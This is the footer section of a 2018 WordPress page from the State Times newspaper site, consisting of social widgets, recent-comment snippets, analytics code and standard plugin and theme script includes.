			  </a>
			</li>
															                              </ul>
                            </div>
                        </div>

</div>
           </div> <!--main sidebar-->
            <div class="clear"></div>                      </div> <!--main inner-->
            
      </div> <!--content boxed wrapper-->
                        <footer id="footer">
                <div class="inner">
	     			<div class="one_fourth">
		<div class="widget momizat-social_counter"><div class="widget-head"><h3 class="widget-title"><span>Socials Counter</span></h3></div>
                        <div class="mom-socials-counter">
                            <ul>
                                                                    <li class="msc-item msc-rss">
                                        <a href="http://news.statetimes.in/feed/"><div class="sc-head">
                                            <i class="fa-icon-rss"></i>
                                            <span>RSS</span>
                                        </div>
                                        </a>
                                        <div class="sc-count">
                                            <span>1000+</span>
                                            Subscribers                                        </div>
                                    </li>
                                
                                
                                                                <li class="msc-item msc-twitter">
                                    <a href="http://twitter.com/@state_times" target="_blank">
                                    <div class="sc-head">
                                        <i class="fa-icon-twitter"></i>
                                        <span>twitter</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>1224</span>
                                        followers                                    </div>
                                </li>
                                
                                                                <li class="msc-item msc-googlePlus">
                                    <a href="https://plus.google.com/+StateTimes1"  target="_blank">
                                        <div class="sc-head">
                                        <i class="fa-icon-google-plus"></i>
                                        <span>google+</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>148</span>
                                        followers                                    </div>
                                </li>
                                
                                
                                
                                
                                
                                
                                
				
                                                            </ul>
                        </div>
</div>			</div>
			<div class="one_fourth">
		<div class="widget momizat-facebook"><div class="widget-head"><h3 class="widget-title"><span>State Times on Facebook</span></h3></div>                <div class="mom_facebook_likebox" style="background:#fff;border:1px solid #e5e5e5;">
<iframe src="//www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/statetimes&amp;width=263&amp;height=290&amp;colorscheme=light&amp;show_faces=true&amp;show_border=false&amp;stream=false&amp;header=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:263px; height:290px;" allowTransparency="true"></iframe>

</div><!--like_box_footer-->

</div>			</div>
			<div class="one_fourth">
			        			</div>
			<div class="one_fourth last">
		<div class="widget momizat-recent_comments"><div class="widget-head"><h3 class="widget-title"><span>Recent Comments</span></h3></div>  <div class="mom-recent-comments">
                            <ul>
                                <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/mr-arnab-goswami-who-is-shameless/#comment-7934" title="Sreekumar Prabhakaran on MR ARNAB GOSWAMI, WHO IS SHAMELESS?"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/mr-arnab-goswami-who-is-shameless/#comment-7934" title="Sreekumar Prabhakaran on MR ARNAB GOSWAMI, WHO IS SHAMELESS?">Sreekumar Prabhakaran</a> <time>on 10 May </time><span class="rc-post">in: <a href="http://news.statetimes.in/mr-arnab-goswami-who-is-shameless/">MR ARNAB GOSWAMI, WHO IS SHAMELESS?</a></span></h4>
                                    <p>Arnab traded journalism for personal and pecuniary rewards. He will no ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/mr-arnab-goswami-who-is-shameless/#comment-7934" title="Sreekumar Prabhakaran on MR ARNAB GOSWAMI, WHO IS SHAMELESS?">Read more</a>
 -->                                    </div>
                                </li>
                                                          <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/mr-arnab-goswami-who-is-shameless/#comment-7933" title="Sayed on MR ARNAB GOSWAMI, WHO IS SHAMELESS?"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/mr-arnab-goswami-who-is-shameless/#comment-7933" title="Sayed on MR ARNAB GOSWAMI, WHO IS SHAMELESS?">Sayed</a> <time>on 10 May </time><span class="rc-post">in: <a href="http://news.statetimes.in/mr-arnab-goswami-who-is-shameless/">MR ARNAB GOSWAMI, WHO IS SHAMELESS?</a></span></h4>
                                    <p>This is also true that Bar association was promoting the Rapists from ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/mr-arnab-goswami-who-is-shameless/#comment-7933" title="Sayed on MR ARNAB GOSWAMI, WHO IS SHAMELESS?">Read more</a>
 -->                                    </div>
                                </li>
                          
                            </ul>
        </div>
</div>			</div>
	    
        <div class="clear"></div>
                </div> <!--// footer inner-->
            </footer> <!--//footer-->
            <div class="copyrights-area">
                <div class="inner">
                    <p class="copyrights-text">© 2017 <a href="#">State Times Daily Newspaper</a></p>
                        <ul class="mom-social-icons">
                    <li class="twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></li>
        
                <li class="facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></li>        
        
                   <li class="gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></li>     
        
        
                        <li class="youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></li>
        
        
        
        

        

        
                        <li class="tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></li>
                             <li class="rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></li>
        	
	    </ul>				                <div class="responsive-toggle">
                	<a class="desktop-version" href="?responsive=false">Desktop Version</a>
                	<a class="mobile-version" href="?responsive=true">Mobile Version</a>
                </div>
                                </div>
           </div>
            <div class="clear"></div>
        </div> <!--Boxed wrap-->
        <a href="#" class="scrollToTop button"><i class="enotype-icon-arrow-up"></i></a>	<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-16385353-2', 'auto');
  ga('require', 'displayfeatures');
  ga('require', 'linkid', 'linkid.js');
  ga('send', 'pageview');

</script>        <script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/comment-reply.min.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/news.statetimes.in\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}},"cached":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/contact-form-7/includes/js/scripts.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/plugins.js?x39047'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var momAjaxL = {"url":"http:\/\/news.statetimes.in\/wp-admin\/admin-ajax.php","nonce":"3aea3b66fc","success":"check your email to complete subscription","error":"Already subscribed","error2":"Email invalid","werror":"Enter a valid city name.","nomore":"No More Posts","homeUrl":"http:\/\/news.statetimes.in","viewAll":"View All","noResults":"Sorry, no posts matched your criteria","bodyad":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/main.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/themes/goodnews5/js/jquery.nicescroll.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/js_composer/assets/lib/prettyphoto/js/jquery.prettyPhoto.min.js?x39047'></script>
<script type='text/javascript' src='http://news.statetimes.in/wp-includes/js/wp-embed.min.js?x39047'></script>
<script async="async" type='text/javascript' src='http://news.statetimes.in/wp-content/plugins/akismet/_inc/form.js?x39047'></script>
    </body>
</html>

<!--
Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

Page Caching using disk 

Served from: news.statetimes.in @ 2018-05-15 22:05:50 by W3 Total Cache
-->